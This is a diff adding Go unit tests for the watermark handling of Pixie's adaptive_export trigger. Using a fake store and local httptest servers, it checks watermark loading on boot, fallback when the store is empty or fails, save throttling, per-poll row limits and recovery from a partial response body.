b/src/vizier/services/adaptive_export/internal/trigger/watermark_test.go @@ -0,0 +1,313 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "sync/atomic" + "testing" + "time" +) + +// fakeStore is an in-memory WatermarkStore for testing trigger +// integration without needing a live ClickHouse. +type fakeStore struct { + mu sync.Mutex + saves []uint64 + loadResult uint64 + loadOK bool + loadErr error + saveErr error +} + +func (f *fakeStore) Load(ctx context.Context, hostname, table string) (uint64, bool, error) { + f.mu.Lock() + defer f.mu.Unlock() + return f.loadResult, f.loadOK, f.loadErr +} + +func (f *fakeStore) Save(ctx context.Context, hostname, table string, wm uint64) error { + f.mu.Lock() + defer f.mu.Unlock() + if f.saveErr != nil { + return f.saveErr + } + f.saves = append(f.saves, wm) + return nil +} + +func (f *fakeStore) savedCount() int { + f.mu.Lock() + defer f.mu.Unlock() + return len(f.saves) +} + +// TestTrigger_LoadsPersistentWatermarkOnBoot — the very first SELECT +// the trigger issues must filter event_time by the persisted watermark, +// not by InitialWatermark or 0. +func TestTrigger_LoadsPersistentWatermarkOnBoot(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadResult: 1744000000000000000, loadOK: true} + tr, err := New(Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + // InitialWatermark deliberately set to a SMALLER value than + // the store's — the store's value must win. + InitialWatermark: 0, + }) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: SQL emits multiIf(...) >= + // (event_time is auto-normalized to nanoseconds). 1.744e18 is already + // ns-scale so it passes through the multiIf unchanged. + if !strings.Contains(q, ") >= 1744000000000000000") { + t.Fatalf("first query did not use persisted watermark; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty — fresh cluster: +// the persistent table has no row for this host yet, trigger uses +// the configured InitialWatermark instead. +func TestTrigger_FallsBackToInitialWatermarkWhenStoreEmpty(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadOK: false} // no row present + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + InitialWatermark: 42, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: InitialWatermark=42 is <1e10 so the + // multiIf treats it as seconds and multiplies by 1e9 → 42_000_000_000. + if !strings.Contains(q, ") >= 42000000000") { + t.Fatalf("first query did not use InitialWatermark fallback; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_FallsBackOnStoreLoadError — store unreachable on boot +// must not block the trigger from starting; it falls back to +// InitialWatermark and continues. +func TestTrigger_FallsBackOnStoreLoadError(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + store := &fakeStore{loadErr: fmt.Errorf("clickhouse unreachable")} + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + Watermark: store, + InitialWatermark: 7, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: InitialWatermark=7 is <1e10 so the + // multiIf treats it as seconds and multiplies by 1e9 → 7_000_000_000. + if !strings.Contains(q, ") >= 7000000000") { + t.Fatalf("error path did not fall back to InitialWatermark; got %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_ThrottledWatermarkSave — successful advances are +// flushed at WatermarkSaveInterval cadence, not on every poll. The +// fake store should see far fewer saves than there were polls. +func TestTrigger_ThrottledWatermarkSave(t *testing.T) { + const row1 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000001","hostname":"node-1"}` + const row2 = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"1000000000000000002","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n%2 == 1 { + _, _ = w.Write([]byte(row1 + "\n")) + } else { + _, _ = w.Write([]byte(row2 + "\n")) + } + })) + defer srv.Close() + + store := &fakeStore{loadOK: false} + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 10 * time.Millisecond, + Watermark: store, + WatermarkSaveInterval: 100 * time.Millisecond, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + go func() { + for range ch { + } + }() + + time.Sleep(250 * time.Millisecond) // ≥ 25 polls, ~2-3 save intervals + saves := store.savedCount() + pollCalls := int(atomic.LoadInt64(&calls)) + if pollCalls < 10 { + t.Fatalf("expected many polls in 250ms; got %d", pollCalls) + } + if saves >= pollCalls { + t.Fatalf("saves not throttled: %d saves vs %d polls", saves, pollCalls) + } + if saves == 0 { + t.Fatalf("no watermark saves at all in 250ms with active rows") + } +} + +// TestTrigger_LimitsRowsPerPoll — every query carries LIMIT N so +// catch-up after a stale watermark doesn't translate into one giant +// scan that times out. +func TestTrigger_LimitsRowsPerPoll(t *testing.T) { + queries := make(chan string, 256) + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + PollLimit: 250, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + _, _ = tr.Subscribe(ctx) + select { + case q := <-queries: + if !strings.Contains(q, "LIMIT 250") { + t.Fatalf("query missing LIMIT clause: %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first poll") + } +} + +// TestTrigger_PartialBodyReadStillAdvances — server emits one +// well-formed line then closes the connection mid-second-line. The +// trigger must still emit the first event AND advance its watermark +// so the next poll picks up from there, instead of looping forever +// on the same start watermark. +func TestTrigger_PartialBodyReadStillAdvances(t *testing.T) { + const goodLine = `{"RuleID":"R1","RuntimeK8sDetails":"{\"podName\":\"p\",\"podNamespace\":\"ns\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":1,\"comm\":\"c\"}}","event_time":"5000","hostname":"node-1"}` + queries := make(chan string, 256) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + queries <- r.URL.Query().Get("query") + n := atomic.AddInt64(&calls, 1) + if n == 1 { + // Take over the raw conn so we can write a valid HTTP response + // then close the connection mid-stream — emulating the + // production failure mode where CH starts streaming, the + // HTTP timeout fires, and the body read returns mid-line. + hj, ok := w.(http.Hijacker) + if !ok { + t.Fatalf("ResponseWriter does not support Hijack") + } + conn, bufrw, err := hj.Hijack() + if err != nil { + t.Fatalf("Hijack: %v", err) + } + _, _ = io.WriteString(bufrw, "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Type: text/plain; charset=utf-8\r\n\r\n") + _, _ = io.WriteString(bufrw, goodLine+"\n") + _, _ = io.WriteString(bufrw, "{\"RuleID\":\"R2\",\"Runtime") + _ = bufrw.Flush() + _ = conn.Close() + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + + tr, _ := New(Config{ + Endpoint: srv.URL, Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + select { + case ev := <-ch: + if ev.Target.PID != 1 { + t.Fatalf("first event PID = %d, want 1", ev.Target.PID) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event from partial body") + } + + // First poll's query went to ch; drain it then wait for the second + // poll and assert the watermark advanced past 0. + <-queries + select { + case q := <-queries: + // post-#10/trigger-unit-normalize: the good line emits event_time="5000" + // (seconds); the advanced watermark goes through the multiIf with the + // sec→ns multiplier (× 1e9) → 5_000_000_000_000. + if !strings.Contains(q, ") >= 5000000000000") { + t.Fatalf("watermark did not advance on partial read; second query: %q", q) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } +}